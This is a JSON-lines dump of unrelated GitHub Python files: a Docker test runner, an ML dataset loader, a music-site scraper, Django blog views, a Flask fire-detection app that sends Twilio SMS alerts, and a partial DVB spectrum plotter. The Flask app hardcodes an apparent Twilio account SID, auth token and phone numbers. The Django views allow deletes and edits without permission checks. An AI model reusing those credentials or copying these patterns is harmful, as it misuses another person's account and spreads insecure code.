subprocess.PIPE\n p = subprocess.Popen(cmds, stdout=output, stderr=output)\n p.wait()\n if p.returncode != 0:\n print(Color('{red}ERROR!{/red}'))\n if output is not None:\n print('STDOUT: {}'.format(p.stdout.read().decode('utf-8')))\n print('STDERR: {}'.format(p.stderr.read().decode('utf-8')))\n raise (SystemExit if exit else ChildProcessError)\n\n\ndef test_image(name, image_output=False, container_output=False, exit=False):\n print_ = print if image_output or container_output else sys.stdout.write\n print_(Color('{yellow}TESTING:{/yellow} {magenta}{}{/magenta}... ').format(name))\n directory = os.path.join(__dir__, name)\n image_name = name.lower()\n execute(['docker', 'build', '-t', image_name, directory], image_output, exit)\n execute(['docker', 'run', '--rm', image_name], container_output, exit)\n print(Color('{green}SUCCESS{/green}'))\n\n\ndef test_all(image_output=False, container_output=False):\n results = []\n for dirname in os.listdir(__dir__):\n if not os.path.isdir(dirname):\n continue\n try:\n test_image(dirname, image_output=image_output, container_output=container_output)\n except ChildProcessError:\n results.append(False)\n else:\n results.append(True)\n print('-' * 60)\n print('PASSED: {} {}/{}'.format(\n ''.join([{False: Color.red('F'), True: Color.green('.')}[x] for x in results]),\n len(list(filter(lambda x: x, results))), len(results)\n ))\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='Test images.')\n parser.add_argument('image', nargs='?')\n parser.add_argument('--image-output', action='store_true')\n parser.add_argument('--container-output', action='store_true')\n args = parser.parse_args()\n if args.image:\n test_image(args.image, args.image_output, args.container_output, True)\n else:\n test_all(args.image_output, args.container_output)\n","repo_name":"Nekmo/simple-monitor-alert","sub_path":"docker/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"31047654904","text":"import os\nimport pandas as pd\nimport numpy as np\n\nimport torch\nimport torchvision.transforms as T\n\nfrom torch.utils.data import Dataset\n\nfrom understanding_clouds.utils import preproces_dataframe_all_masks, get_all_masks_and_img\nfrom understanding_clouds.constants import LABELS_MAPPING\n\n\nclass MaskRCNNDataset(Dataset):\n def __init__(self, images_dirpath, transforms=None, img_scale_factor=4, subsample=None, split_ids=None, csv_name='train.csv'):\n self.images_dirpath = images_dirpath\n df = pd.read_csv(os.path.join(images_dirpath, csv_name))\n df = preproces_dataframe_all_masks(df)\n df = df.iloc[split_ids] if split_ids is not None else df\n self.df = df.iloc[::subsample] if subsample is not None else df\n self.transforms = transforms\n self._img_scale_factor = img_scale_factor\n\n def __getitem__(self, index):\n\n masks, img, labels = get_all_masks_and_img(\n self.df, index, os.path.join(self.images_dirpath, 'train_images'), scale_factor=self._img_scale_factor)\n img_filename = self.df.iloc[index]['filename']\n # img_id = self.df.iloc[index]['filename']\n labels = [LABELS_MAPPING[l] for l in labels]\n labels = [l for l in labels if l > 0]\n bboxes, masks_not_empty = [], []\n for mask in filter(lambda x: np.sum(x) > 0, masks):\n # it returns a tuple of indices where elements are not zero, it is almost an alias for np.asarray(condition).nonzero(), see np.nonzero documentation for more details\n pos = np.where(mask)\n xmin = np.min(pos[1])\n xmax = np.max(pos[1])\n ymin = np.min(pos[0])\n ymax = np.max(pos[0])\n bbox = [xmin, ymin, xmax, ymax]\n bboxes.append(bbox)\n masks_not_empty.append(mask)\n\n img_id = torch.tensor([index])\n labels = torch.as_tensor(labels, dtype=torch.int64)\n bboxes = torch.as_tensor(bboxes, dtype=torch.float32)\n area = (bboxes[:, 3] - bboxes[:, 1]) * \\\n (bboxes[:, 2] - bboxes[:, 0])\n masks = torch.as_tensor(\n masks_not_empty, dtype=torch.uint8) / 255\n iscrowd = torch.zeros((len(masks),), dtype=torch.int64)\n\n target = {'boxes': bboxes,\n 'masks': masks,\n 'labels': labels,\n 'image_id': img_id,\n 'area': area,\n 'filename': img_filename}\n\n img = T.ToTensor()(img)\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target\n\n def __len__(self):\n return len(self.df)\n","repo_name":"wkondrusiewicz/understanding_clouds","sub_path":"understanding_clouds/datasets/mask_rcnn_dataset.py","file_name":"mask_rcnn_dataset.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42358497057","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis is a not a general purpose script.\nThis script helps in scrapping and downloading the Music files from starmusiq.fun website.\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport zipfile\nimport io\nimport sys\n\nbaseURL = \"https://www.starmusiq.fun\"\nnavURLs = { \"top25\":\"/player/top-25-hits-by-year-month-week-starmusiq.html\",\n \"latest\":\"/latest/latest-2018-movie-songs-starmusiq.html\",\n \"composer\":\"/composers/list-of-music-composers-starmusiq.html\",\n \"movies\": \"/search/search-for-blocked-movies-starmusiq.html\"}\nnavByPage = True\ndownloadIndividualSong = True\n\n\ndef browsePage(baseURL, navURL=\"\"):\n try:\n page = requests.get(baseURL + navURL)\n soup = BeautifulSoup(page.content, \"html.parser\")\n return soup\n except requests.exceptions.RequestException as e:\n print(\"URL not reachable\")\n print(e)\n callQuit()\n\n\ndef scrapTop25List(soup):\n for div in soup.find_all(\"div\", {\"id\": \"hits_list\"}):\n for a in div.find_all(\"a\", {\"class\": \"text-warning\"}):\n songName = a.parent.parent.find(\"a\").text.split(\" - \")[0] + \" - \" + a.text\n navURL = a[\"href\"]\n yield songName, baseURL, navURL\n\n\ndef scrapComposerList(soup):\n for a in soup.find_all(\"a\"):\n if a.text == \"View Movies\":\n composerName = a[\"title\"].split(\" - \")[0][5:]\n navURL = a[\"href\"]\n yield composerName, baseURL, navURL\n if navByPage :\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Previous\"}):\n navURL = a[\"href\"]\n yield \"Previous...\", baseURL, navURL\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Next\"}):\n navURL = a[\"href\"]\n yield \"Next...\", baseURL, navURL\n else:\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Next\"}):\n navURL = a[\"href\"]\n soup = browsePage(baseURL, navURL)\n yield from scrapComposerList(soup)\n\n\ndef scrapLatestList(soup):\n # since latest list and movie list are same, use the same function.\n yield from scrapMovieList(soup)\n\n\ndef scrapMovieList(soup):\n for a in soup.find_all(\"a\"):\n if (a.text == \"Download Album\") and not (\"single\" in a[\"href\"]):\n movieName = a[\"title\"].split(\" - \")[0]\n navURL = a[\"href\"]\n yield movieName, baseURL, navURL\n if navByPage :\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Previous\"}):\n navURL = a[\"href\"]\n yield \"Previous...\", baseURL, navURL\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Next\"}):\n navURL = a[\"href\"]\n yield \"Next...\", baseURL, navURL\n else:\n for a in soup.find_all(\"a\", {\"aria-label\": \"Next\"}):\n navURL = a[\"href\"]\n soup = browsePage(baseURL, navURL)\n yield from scrapMovieList(soup)\n\n\ndef scrapSongList(soup):\n for a in soup.find_all(\"a\"):\n if a.text.upper() == \"DOWNLOAD 320KBPS\":\n songName = a.parent.previous_sibling.find(\"a\").text.split(\" - \")[0]\n baseURL = a[\"href\"].split(\"?\")[0]\n navURL = \"?\" + a[\"href\"].split(\"?\")[1]\n yield songName, baseURL, navURL\n\n\ndef scrapAllSongZipfile(soup):\n found = False\n # Try with CSS Selector\n for div in soup.select(\"html body div.container div.row div.col-xs-12.col-sm-12.col-md-8 div.panel.panel-default div.panel-body div.row div.panel.panel-danger div.panel-body div.row div.col-md-8\"):\n for a in div.find_all(\"a\"):\n if \"320KBPS\" in str(a.text).upper():\n found = True\n songZipFileName = a.text\n baseURL = a[\"href\"].split(\"?\")[0]\n navURL = \"?\" + a[\"href\"].split(\"?\")[1]\n yield songZipFileName, baseURL, navURL\n # Try with keywords in tags\n if not found:\n for a in soup.find_all(\"a\"):\n if (\"320KBPS ZIP FILE\" or \"320KBPS ZIP\" or \"320KBPS LINK\") in str(a.text).upper():\n found = True\n songZipFileName = a.text\n baseURL = a[\"href\"].split(\"?\")[0]\n navURL = \"?\" + a[\"href\"].split(\"?\")[1]\n yield songZipFileName, baseURL, navURL\n\n if not found:\n print(\"Cannot find 320KBPS download file. For manual download use the below url..\")\n yield found\n\n\ndef scrapDownloadLink(soup):\n found = False\n for a in soup.find_all(\"a\"):\n if \"Download Now\" in a.text:\n found = True\n navURL = a[\"href\"]\n yield navURL\n if not found:\n print(\"Cannot find Download link. For manual download use the below url..\")\n yield found\n\n\ndef downloadAndExtract(url, songName = ''):\n\n try:\n print(\"Starting to download...\")\n r = requests.get(url)\n print(\"Download Completed !!!\")\n\n if not downloadIndividualSong:\n try:\n print(\"Starting to extract...\")\n z = zipfile.ZipFile(io.BytesIO(r.content))\n z.extractall(\"../Downloads/\")\n print(\"Extraction Completed !!!\")\n except:\n print(\"Couldnot Extract File. For manual download use the following url..\")\n print(url)\n else:\n try:\n print(\"Saving File...\")\n with open(\"../Downloads/\" + songName, 'w') as s:\n s.write(io.BytesIO(r.content))\n print(\"Completed !!!\")\n except:\n print(\"Couldnot save File. For manual download use the following url..\")\n print(url)\n\n\n except:\n print(\"Cannot Download File. For manual download use the following url..\")\n print(url)\n\n\ndef decodeSelection(keyInput, menuListLength):\n selectList = []\n for i in keyInput.split(\",\"):\n if \"q\" in i:\n callQuit()\n elif \":\" in i:\n l, h = map(int, i.split(\":\"))\n selectList += range(l, h+1)\n else:\n selectList.append(int(i))\n for i in selectList:\n if i > menuListLength:\n print(\"Enter Valid Selection\")\n yield from decodeSelection(keyInput, menuListLength)\n for i in selectList:\n yield i - 1\n\n\ndef getSelectionList(baseURL, navURL, scrapType):\n\n soup = browsePage(baseURL, navURL)\n\n menuListLength = 0\n for index, menuItem in enumerate(scrapTypeList[scrapType](soup)):\n print(index + 1, menuItem[0], menuItem[1], menuItem[2])\n menuListLength += 1\n\n keyInput = input(\"Enter selection(s) (Comma separated for multiples or Colon for range) or q to Quit\\n: \")\n\n for index, menuItem in enumerate(scrapTypeList[scrapType](soup)):\n if index in decodeSelection(keyInput, menuListLength):\n if menuItem[0] == \"Next...\":\n print(\"Getting next page..\")\n navURL = menuItem[2]\n yield from getSelectionList(baseURL, navURL, scrapType)\n elif menuItem[0] == \"Previous...\":\n print(\"Getting previous page..\")\n navURL = menuItem[2]\n yield from getSelectionList(baseURL, navURL, scrapType)\n else:\n menuName = menuItem[0]\n baseURL = menuItem[1]\n navURL = menuItem[2]\n yield menuName, baseURL, navURL\n\n\ndef callQuit():\n try:\n sys.exit(0)\n except SystemExit as e:\n pass\n\n\ndef main():\n\n def getTop25(baseURL, navURL):\n # global downloadIndividualSong = True\n for movie in getSelectionList(baseURL, navURL, \"top25\"):\n soup = browsePage(movie[1], movie[2])\n for song in scrapSongList(soup):\n if movie[0].split(\" - \")[0].upper() == song[0].upper():\n print(\"Getting download url for song\", song[0])\n soup = browsePage(song[1], song[2])\n for url in scrapDownloadLink(soup):\n if not url:\n print(url)\n else:\n print(\"Downloadable\", song[1] + url)\n downloadAndExtract(song[1] + url, song[0])\n\n def getLatest(baseURL, navURL):\n for movie in getSelectionList(baseURL, navURL, \"latest\"):\n print(\"Getting song list of\", movie[0])\n if downloadIndividualSong:\n getSongList(movie[1], movie[2])\n else:\n getSongBulk(movie[1], movie[2])\n\n def getComposer(baseURL, navURL):\n for composer in getSelectionList(baseURL, navURL, \"composer\"):\n print(\"Getting movie list of\", composer[0])\n getMovie(composer[1], composer[2])\n\n def getMovie(baseURL, navURL):\n for movie in getSelectionList(baseURL, navURL, \"movie\"):\n print(\"Getting song list of\", movie[0])\n if downloadIndividualSong:\n getSongList(movie[1], movie[2])\n else:\n getSongBulk(movie[1], movie[2])\n\n def getSongList(baseURL, navURL):\n for song in getSelectionList(baseURL, navURL, \"song\"):\n print(\"Extracting download url for song\", song[0])\n soup = browsePage(song[1], song[2])\n for url in scrapDownloadLink(soup):\n if not url:\n print(url)\n else:\n print(\"Downloadable\", song[1] + url)\n downloadAndExtract(url)\n\n def getSongBulk(baseURL, navURL):\n soup = browsePage(baseURL, navURL)\n for song in scrapAllSongZipfile(soup):\n if not song:\n print(baseURL + navURL)\n else:\n print(\"Extracting download url\")\n soup = browsePage(song[1], song[2])\n for url in scrapDownloadLink(soup):\n if not url:\n print(url)\n else:\n print(\"Downloadable\", song[1] + url)\n downloadAndExtract(url)\n\n keyInput = input(\"Enter Selection:\\n\\t1 for Top 25\\n\\t2 for Latest\\n\\t3 for Composer List\\n\\t4 for Movie List\\n: \")\n\n\n if keyInput == \"1\":\n print(\"Getting list of Top 25 songs...\")\n navURL = navURLs[\"top25\"]\n getTop25(baseURL, navURL)\n\n elif keyInput == \"2\":\n print(\"Getting list of latest movies...\")\n navURL = navURLs[\"latest\"]\n getLatest(baseURL, navURL)\n\n elif keyInput == \"3\":\n print(\"Getting list of composers..\")\n navURL = navURLs[\"composer\"]\n getComposer(baseURL, navURL)\n\n else:\n print(\"Getting list of movies...\")\n navURL = navURLs[\"movies\"]\n getMovie(baseURL, navURL)\n\n\nif __name__ == \"__main__\":\n scrapTypeList = { \"top25\":scrapTop25List,\n \"latest\":scrapLatestList,\n \"composer\":scrapComposerList,\n \"movie\":scrapMovieList,\n \"song\":scrapSongList,\n \"songBulk\": scrapAllSongZipfile}\n main()\n\n","repo_name":"arunkrish16/parseStarMusiq","sub_path":"parseStarMusiq.py","file_name":"parseStarMusiq.py","file_ext":"py","file_size_in_byte":11046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8766489903","text":"def isUniqChars(str):\n # assume characters are ASCII, total 256 characters\n # if the string is greater than 256, there is duplicate\n if len(str) > 256:\n return False\n # initialize boolean array\n hash = [False] * 256\n\n for ch in str:\n # if boolean array is true, then there is duplicate\n if hash[ord(ch)] is True:\n return False\n # if the value in hash is False, the value is not duplicate yet\n else:\n hash[ord(ch)] = True\n\n return True","repo_name":"leeyulkyu/giveMeAChance","sub_path":"isUniqChars.py","file_name":"isUniqChars.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12589474773","text":"from django.shortcuts import render, HttpResponse\nfrom .models import *\nfrom django.contrib.auth.models import User\nfrom .forms import *\nfrom django.db.models import Q\n\n# Create your views here.\ndef homepage(request):\n if \"key_word\" in request.GET:\n key = request.GET.get(\"key_word\")\n article = Article.objects.filter(Q(active=True) , Q(title__contains=key) , \n Q(text__contains=key) | Q(tags__name__contains=key)|\n Q(readers__username__contains=key)| Q(picture__contains=key)|\n Q(picture__contains=key)| Q(comments__text__contains=key))\n article = article.distinct()\n else:\n article =Article.objects.filter(active=True)\n\n return render(request , \"article/homepage.html\", locals() ) \n\ndef articles(request,tag):\n context={}\n tag = Tag.objects.get(name=tag)\n context[\"articles\"]= Article.objects.filter(tag=tag)\n return render(request, \"articles.html\",context)\n\ndef authors(request):\n authors = Author.objects.all()\n return render(request , \"article/author.html\",\n {\"authors\":authors})\n\ndef users(request):\n users_all = User.objects.all()\n return render(request , \"article/users.html\",\n {\"users_all\":users_all})\n\ndef detai(request, pk):\n article = Article.objects.get(pk=pk)\n article.views +=1\n user = request.user\n if not user.is_anonymous:\n article.readers.add(user)\n article.save()\n\n\n if request.method ==\"POST\":\n if \"delete_btn\" in request.POST:\n article = Article.objects.get(pk=pk)\n article.active = False\n article.save()\n return redirect(homepage)\n elif \"add_comment_btn\" in request.POST:\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = Comment()\n comment.user = request.user \n comment.article = article\n comment.text = form.cleaned_data[\"text\"]\n comment.save()\n\n context = {}\n context[\"article\"] = Article.objects.get(pk=pk)\n context[\"form\"] = CommentForm()\n\n return render(request, \"article.html\", context )\n \n\ndef edit_article (request,pk):\n article = Article.objects.get(pk=pk)\n\n if request.method == \"POST\":\n form = ArticleForm(request.POST ,request.FILES ,instance=article)\n if form.is_valid():\n article.title = form.cleaned_data[\"title\"]\n article.text = form.cleaned_data[\"text\"]\n article.picture = form.cleaned_data[\"picture\"]\n article.save()\n\n tags = form.cleaned_data[\"tags\"]\n for tag in tags.split(\",\"):\n obj,created = Tag.objects.get_or_create(name=tag)\n article.tag.add(obj)\n \n article.save()\n context = {}\n context[\"article\"] = article\n context[\"form\"] = CommentForm()\n context[\"message\"] = \"Статья была изменена успешно!\"\n\n \n return render(request , \"article/succsess.html\",context)\n\n forms = ArticleForm(instance=article)\n return render(request ,\"article/add_article.html\", {'forms':forms})\n\n\ndef add_article(request):\n if request.method == \"POST\":\n form = ArticleForm(request.POST ,request.FILES)\n if form.is_valid():\n if not Author.objects.filter(user=request.user):\n author = Author(\n user= request.user ,\n name= request.user.username \n )\n author.save()\n else:\n author = Author.objects.get(user=request.user )\n\n article = Article()\n article.author = author\n article.title = form.cleaned_data[\"title\"]\n article.text = form.cleaned_data[\"text\"]\n article.picture = form.cleaned_data[\"picture\"]\n article.save()\n \n\n tags = form.cleaned_data[\"tags\"]\n for tag in tags.split(\",\"):\n obj,created = Tag.objects.get_or_create(name=tag)\n article.tag.add(obj)\n \n article.save()\n return render(request , \"article/succsess.html\")\n\n forms = ArticleForm()\n return render(request, \"article/add_article.html\", {'forms': forms})\n\ndef profile(request, pk):\n author = Author.objects.get(pk=pk)\n return render(request, \"article/profile.html\", locals())\n \n\ndef add_author(request):\n if request.method ==\"GET\":\n form = AuthorForm()\n context = {}\n context[\"form\"] = form\n return render(request,\"article/add_author.html\",context)\n\n elif request.method == \"POST\":\n form = AuthorForm(request.POST)\n if form.is_valid():\n form.save()\n return render(request,\"article/success.html\")\n\ndef edit_comment (request,pk):\n comment = Comment.objects.get(pk=pk)\n if request.method == \"POST\":\n form = CommentForm(request.POST , instance=comment)\n if form.is_valid():\n form.save()\n return render(request , \"article/succsess.html\")\n\n forms = CommentForm(instance=comment)\n return render(request ,\"article/comment_form.html\", {'forms':forms})\n \ndef delete_comment(request,pk):\n Comment.objects.get(pk=pk).delete()\n return render(request,\"article/success.html\")\n \n\n\n","repo_name":"tomebore/blog","sub_path":"itblog/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2842332495","text":"from __future__ import division, print_function\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom tensorflow.keras.preprocessing import image \nfrom tensorflow.keras.models import load_model\nfrom flask import Flask, request, render_template,url_for\nfrom werkzeug.utils import secure_filename\nimport cv2\nimport smtplib\nfrom twilio.rest import Client\nfrom pathlib import Path\nfrom playsound import playsound\n\nglobal graph\n#graph=tf.get_default_graph()\n# Define a flask app\napp = Flask(__name__)\nmodel = load_model('forest1.h5')\n\n\nprint('Model loaded. Check http://127.0.0.1:5000/')\n\n\n\n\n@app.route('/', methods=['GET'])\ndef index():\n # Main page\n return render_template('digital.html')\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef upload():\n if request.method == 'POST':\n # Get the file from post request\n f = request.files['image']\n\n # Save the file to ./uploads\n basepath = os.path.dirname(__file__)\n file_path = os.path.join(\n basepath, 'uploads', secure_filename(f.filename))\n f.save(file_path)\n img = image.load_img(file_path, target_size=(64,64))\n \n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n \n #with graph.as_default():\n preds = np.argmax(model.predict(x))\n index = [\"forest\",\"with fire\"]\n print(preds)\n text = index[preds]\n return text\n \n@app.route('/video', methods=['GET', 'POST'])\ndef opencv():\n video = cv2.VideoCapture(0)\n name = ['forest','with fire']\n while(1):\n success, frame = video.read()\n cv2.imwrite(\"image.jpg\",frame)\n img = image.load_img(\"image.jpg\",target_size = (64,64))\n x = image.img_to_array(img)\n x = np.expand_dims(x,axis = 0)\n pred=np.argmax(model.predict(x),axis=1)\n #pred = model.predict_classes(x)\n pred=model.predict(x)\n #p = pred[0]\n p=int(pred[0][0])\n print(pred)\n #cv2.putText(frame, \"predicted class = \"+str(name[p]), (100,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0), 1)\n \n \n pred = model.predict(x)\n pred=np.argmax(model.predict(x),axis=1)\n print(pred)\n #cv2.putText(frame, \"predicted class = \"+str(name[pred]), (100,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0), 1)\n if pred[0]==1:\n \n cv2.putText(frame, \"predicted class = Fire Detected\" ,(100,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0), 1)\n account_sid = 'ACae95ea785737954a0a96c91f64101221'\n auth_token = '0d013e13203434b42e0916c191b9fc6f'\n client = Client(account_sid, auth_token)\n\n message = client.messages \\\n .create(\n body='forest fire is detected,stay alert',\n # use twilio free number\n from_='+18588081954',\n # to number\n to='+918248133285')\n print(message.sid)\n \n print('Fire Detected')\n print ('SMS sent!')\n audio = Path().cwd() / \"alert.mp3\"\n playsound(audio)\n #return 'Fire Detected'\n return render_template('video.html',pred=\"Fire Detected Aler Notification Sent\")\n break\n else:\n cv2.putText(frame, \"predicted class = No Danger\",(100,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0), 1)\n print(\"no danger\")\n #break\n cv2.imshow(\"image\",frame)\n \n if cv2.waitKey(1) & 0xFF == ord('a'): \n break\n\n video.release()\n cv2.destroyAllWindows()\n return render_template('digital.html')\n\nif __name__ == '__main__':\n app.run(threaded = False)\n\n","repo_name":"IBM-EPBL/IBM-Project-52650-1661060112","sub_path":"Final Deliverable/Web Application/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"14425251740","text":"from functools import lru_cache\nimport wx\nimport warnings\nimport os\nimport sys\nimport time\nimport datetime\nimport regex as re\nfrom dateutil import tz\nimport matplotlib as mpl\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg as NavigationToolbar\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport warnings\n\nimport mpl_scatter_density # adds projection='scatter_density'\nfrom matplotlib.colors import LinearSegmentedColormap\n\nimport numpy as np\n\n#from sklearn.linear_model import LinearRegression\n#import pandas as pd\n\nfrom neumodvb.util import dtdebug, dterror\nfrom neumodvb.neumodbutils import enum_to_str\nfrom neumodvb.neumo_dialogs import ShowMessage\nimport pyspectrum\nimport pystatdb\nimport pychdb\nimport pydevdb\nimport datetime\n\n#horrible hack: matplotlib (in neumplot.py) uses the presence of this module to decide what backend to\n#use and then refuses to use wx\nif 'gi.repository.Gtk' in sys.modules:\n del sys.modules['gi.repository.Gtk']\nmpl.use('WXAgg')\n\nclass CustomToolbar(NavigationToolbar):\n \"\"\"\n toolbar which intercepts the readout cursor (which causes trouble)\n \"\"\"\n def __init__(self, canvas):\n\n super().__init__(canvas)\n\n def mouse_move(self, event):\n self._update_cursor(event)\n\n if event.inaxes and event.inaxes.get_navigate():\n\n try:\n s = event.inaxes.format_coord(event.xdata, event.ydata)\n except (ValueError, OverflowError):\n pass\n else:\n s = s.rstrip()\n artists = [a for a in event.inaxes._mouseover_set\n if a.contains(event)[0] and a.get_visible()]\n if artists:\n a = cbook._topmost_artist(artists)\n if a is not event.inaxes.patch:\n data = a.get_cursor_data(event)\n if data is not None:\n data_str = a.format_cursor_data(data).rstrip()\n if data_str:\n s = s + '\\n' + data_str\n #self.set_message(s)\n else:\n pass #self.set_message(self.mode)\n\ndef tooltips(fig):\n def update_annot(ind):\n\n pos = sc.get_offsets()[ind[\"ind\"][0]]\n annot.xy = pos\n text = \"{}, {}\".format(\" \".join(list(map(str,ind[\"ind\"]))),\n \" \".join([names[n] for n in ind[\"ind\"]]))\n annot.set_text(text)\n annot.get_bbox_patch().set_facecolor(cmap(norm(c[ind[\"ind\"][0]])))\n annot.get_bbox_patch().set_alpha(0.4)\n\n\n def hover(event):\n vis = annot.get_visible()\n if event.inaxes == ax:\n cont, ind = sc.contains(event)\n if cont:\n update_annot(ind)\n annot.set_visible(True)\n fig.canvas.draw_idle()\n else:\n if vis:\n annot.set_visible(False)\n fig.canvas.draw_idle()\n\n #fig.canvas.mpl_connect(\"motion_notify_event\", hover)\n\n\ndef plot_marks(marks, offset=-55, label='xxx', use_index=True):\n global ret\n n = len(ret[0][:,1])\n f = np.array(range(0,n))\n sig = marks*offset\n plt.plot(f, sig, '+', label=label)\n plt.legend()\n\ndef get_renderer(fig):\n try:\n return fig.canvas.get_renderer()\n except AttributeError:\n return fig.canvas.renderer\n\ndef get_bboxes(objs, r=None, expand=(1, 1), ax=None, transform=None):\n \"\"\"\n\n Parameters\n ----------\n objs : list, or PathCollection\n List of objects to get bboxes from. Also works with mpl PathCollection.\n r : renderer\n Renderer. The default is None, then automatically deduced from ax.\n expand : (float, float), optional\n How much to expand bboxes in (x, y), in fractions. The default is (1, 1).\n ax : Axes, optional\n The default is None, then uses current axes.\n transform : optional\n Transform to apply to the objects, if they don't return they window extent.\n The default is None, then applies the default ax transform.\n Returns\n -------\n list\n List of bboxes.\n \"\"\"\n ax = ax or plt.gca()\n r = r or get_renderer(ax.get_figure())\n try:\n return [i.get_window_extent(r).expanded(*expand) for i in objs]\n except (AttributeError, TypeError):\n try:\n if all([isinstance(obj, matplotlib.transforms.BboxBase) for obj in objs]):\n return objs\n else:\n raise ValueError(\"Something is wrong\")\n except TypeError:\n return get_bboxes_pathcollection(objs, ax)\n\nclass Tp(object):\n def __init__(self, spectrum, freq, symbol_rate):\n self.spectrum = spectrum\n self.freq = freq\n self.symbol_rate = symbol_rate\n self.scan_ok = False\n self.scan_failed = False\n\n def __str__(self):\n return f'{self.freq:8.3f}{self.spectrum.pol} {self.symbol_rate}kS/s'\n\ndef find_nearest(array,value):\n import math\n idx = np.searchsorted(array, value, side=\"left\")\n if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):\n return idx-1\n else:\n return idx\n\ndef overlaps(a, b):\n \"\"\"\n assumes that a.xmin < b.xmin\n \"\"\"\n return b.xmin < a.xmax and (a.ymin <= b.ymin < a.ymax or b.ymin <= a.ymin < b.ymax )\n\nall_rects=[]\n\ndef remove_rects():\n global all_rects\n for rect in all_rects:\n rect.remove()\n all_rects = []\n\ndef combine_ranges(a, b):\n if a is None and b is None:\n return None\n if a is None or b is None:\n return a if b is None else b\n return (min(a[0], b[0]), max(a[1], b[1]))\n\nclass Spectrum(object):\n def __init__(self, parent, spectrum, color):\n self.spectrum = spectrum\n self.parent = parent\n self.figure = self.parent.figure\n self.axes = self.parent.axes\n self.drawn = False\n self.color = color\n sat = pychdb.sat_pos_str(self.spectrum.k.sat_pos)\n date = datetime.datetime.fromtimestamp(self.spectrum.k.start_time , tz=tz.tzlocal()).strftime(\"%Y-%m-%d %H:%M\")\n label = f'{date} {sat} {enum_to_str(self.spectrum.k.pol)} dish {self.spectrum.k.rf_path.lnb.dish_id}'\n self.label = label\n self.annots = []\n self.tps = []\n self.peak_data = None\n self.vlines = None\n self.hlines = None\n self.annot_box = ((0,0))\n self.annot_maxy = None\n self.xlimits = None # minimal and maximal frequency in this plot (initially unknown)\n self.ylimits = None # minimal and maximal signal in this plot (initially unknown)\n\n def __str__(self):\n sat = pychdb.sat_pos_str(self.spectrum.k.sat_pos)\n return f'{sat} {enum_to_str(self.spectrum.k.pol)} dish {self.spectrum.k.rf_path.lnb.dish_id}'\n\n def tps_to_scan(self) :\n return [ tp for tp in self.tps if not tp.scan_failed and not tp.scan_ok ]\n\n def clear(self):\n for a in self.annots:\n a.remove()\n self.annots=[]\n if self.spectrum_graph is not None:\n for a in self.spectrum_graph:\n a.remove()\n self.spectrum_graph = None\n if self.vlines is not None:\n self.vlines.remove()\n self.vlines = None\n\n if self.hlines is not None:\n self.hlines.remove()\n self.hlines = None\n\n def annot_for_freq(self, freq):\n found = None\n best = 20000000\n for annot in self.annots:\n delta= abs(annot.tp.freq - freq)\n if delta < best:\n found = annot\n best = delta\n return found, best\n\n def annot_for_peak(self, peak):\n found = None\n best = 20000000\n if peak is None:\n return None\n for annot in self.annots:\n delta= abs(annot.tp.freq*1000 - peak.frequency)\n if delta < best and annot.tp.spectrum.spectrum.k.pol == peak.pol:\n found = annot\n best = delta\n return found\n def show(self):\n if self.drawn:\n #dtdebug('clearing plot')\n #self.axes.clear()\n self.clear()\n receiver = wx.GetApp().receiver\n path = receiver.get_spectrum_path()\n spectrum_fname = ''.join([path, '/', self.spectrum.filename, \"_spectrum.dat\"])\n tps_fname = ''.join([path, '/', self.spectrum.filename, \"_peaks.dat\"])\n pol = self.spectrum.k.pol\n ret = self.process(spectrum_fname, tps_fname)\n self.drawn = True\n return ret\n\n def make_tps(self, tpsname):\n #n = len(spec[:,1])\n recompute = True\n if recompute:\n from pyspectrum import find_spectral_peaks\n peak_freq, peak_sr = find_spectral_peaks(self.spec[:,0], self.spec[:,1])\n self.peak_data = np.vstack([peak_freq, peak_sr]).T\n else:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n self.peak_data = np.loadtxt(tpsname, ndmin=2)\n if len(self.peak_data) == 0:\n return\n f = self.peak_data[:,0]\n snr = None\n for row in self.peak_data:\n tp = Tp(spectrum=self, freq=row[0], symbol_rate=row[1]/1000.)\n self.tps.append(tp)\n\n def plot_spec(self, fname):\n dtdebug(f\"loading spectrum {fname}\")\n try:\n self.spec = np.atleast_2d(np.loadtxt(fname))\n except:\n ShowMessage(f'Could not open {fname}')\n return False\n if self.parent.do_detrend:\n self.detrend()\n t = self.spec[:,0]\n a = self.spec[:,1]\n 